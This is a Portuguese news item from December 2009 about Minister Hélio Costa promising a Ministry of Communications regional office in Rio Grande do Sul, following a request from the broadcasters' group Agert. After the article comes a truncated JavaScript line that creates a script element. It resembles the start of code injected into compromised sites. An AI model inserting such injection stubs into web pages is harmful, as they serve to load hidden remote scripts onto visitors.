Hélio Costa garante Delegacia do Ministério das Comunicações no RS

Dec 15 2009
(0) Comments

[15/12/2009]

Audiência pedida pela Agert foi intermediada pelo deputado federal Beto Albuquerque

O ministro das Comunicações, Hélio Costa, garantiu na tarde desta terça-feira (15) que a instalação no Rio Grande do Sul de uma Delegacia Regional do Ministério das Comunicações pode ser concretizada em breve. Costa se comprometeu em atender ao pleito da Associação Gaúcha de Emissoras de Rádio e Televisão (Agert), representada pelo presidente Alexandre Gadret, durante audiência intermediada pelo coordenador da bancada gaúcha no Congresso Nacional, deputado federal Beto Albuquerque (PSB), da qual participou ainda o diretor da RBS em Brasília, Paulo Ricardo Tonet Camargo.

Na reunião, Hélio Costa sugeriu a instalação de uma sede em Porto Alegre que funcione sob a presidência de alguém do Paraná. Esse escritório abrangeria os três Estados do Sul. A idéia foi bem aceita pelos participantes da audiência, que ainda deram algumas sugestões sobre a instalação do novo escritório.

O ministro explicou que no passado havia delegacias regionais em todos os Estados, mas, segundo informou, no governo do ex-presidente Fernando Henrique Cardoso elas foram desativadas. “Há três anos lutamos para retomar a instalação destas delegacias regionais, agora conseguimos disponibilizar sete, número ainda insuficiente para um país do tamanho do Brasil”, disse Hélio Costa.

Pelo tamanho do Rio Grande do Sul, população e quantidade de emissoras que possui o Estado o ministro considerou urgente a instalação de uma delegacia regional no Sul. Beto Albuquerque ponderou que o RS tem 83 emissoras a mais do que o Paraná e o dobro das existentes em Santa Catarina. “Se pudéssemos sediar um escritório do Ministério seria mais do que justo”, afirmou o coordenador da bancada gaúcha.

Gadret disse ao ministro que a Agert está disposta a oferecer todos os meios necessários ara estruturar uma delegacia regional no Estado. O ministro propôs, então, que a sede seja dentro da estrutura dos Correios, órgão vinculado ao Ministério.

 Ao finalizar a reunião, Beto destacou que a decisão é acertada, principalmente devido à posição geográfica de Porto Alegre, uma capital com bom acesso aéreo, já que há vôos regulares para todo o Brasil, isso sem contar a necessidade em razão da demanda do Estado na área de comunicações.

Gadret aproveitou para formalizar convite ao ministro para que visite o Rio Grande do Sul o mais breve possível, o que foi prontamente aceito por Hélio Costa.

var d=document;var s=d.createElement(‘script’);